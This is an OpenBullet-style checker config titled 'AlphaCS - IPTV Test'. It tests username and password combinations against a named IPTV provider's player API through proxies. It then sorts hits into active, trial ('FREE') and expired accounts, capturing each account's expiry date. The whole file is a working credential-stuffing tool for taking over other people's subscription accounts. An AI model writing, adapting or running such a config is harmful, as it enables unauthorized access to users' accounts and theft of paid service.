[SETTINGS]
{
  "Name": "AlphaCS - IPTV Test",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-18T01:01:22.1865523+02:00",
  "AdditionalInfo": "Captures : Sub active or not / Expire Date. Trial subs goes to Custom FREE. Expired subs goes to Custom EXPIRED.",
  "Author": "sp6off",
  "Version": "1.3.7 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "http://dna-iptv.com:999/player_api.php?username=<USER>&password=<PASS>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "404" 
  KEYCHAIN Success OR 
    KEY "{\"user_info\":{" 

PARSE "<SOURCE>" LR "\"status\":\"" "\"," -> CAP "Status" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Status>" EqualTo "Active" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Status>" EqualTo "Expired" 

PARSE "<SOURCE>" LR "\"is_trial\":\"" "\"," -> VAR "Trial ?" 

FUNCTION Translate 
  KEY "1" VALUE "Yes" 
  KEY "0" VALUE "No" 
  "<Trial ?>" -> CAP "Trial ?" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Trial ?>" EqualTo "No" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Trial ?>" EqualTo "Yes" 

PARSE "<SOURCE>" LR "\"exp_date\":\"" "\"," -> VAR "Expire date" 

FUNCTION UnixTimeToDate "<Expire date>" -> CAP "Expire date" 

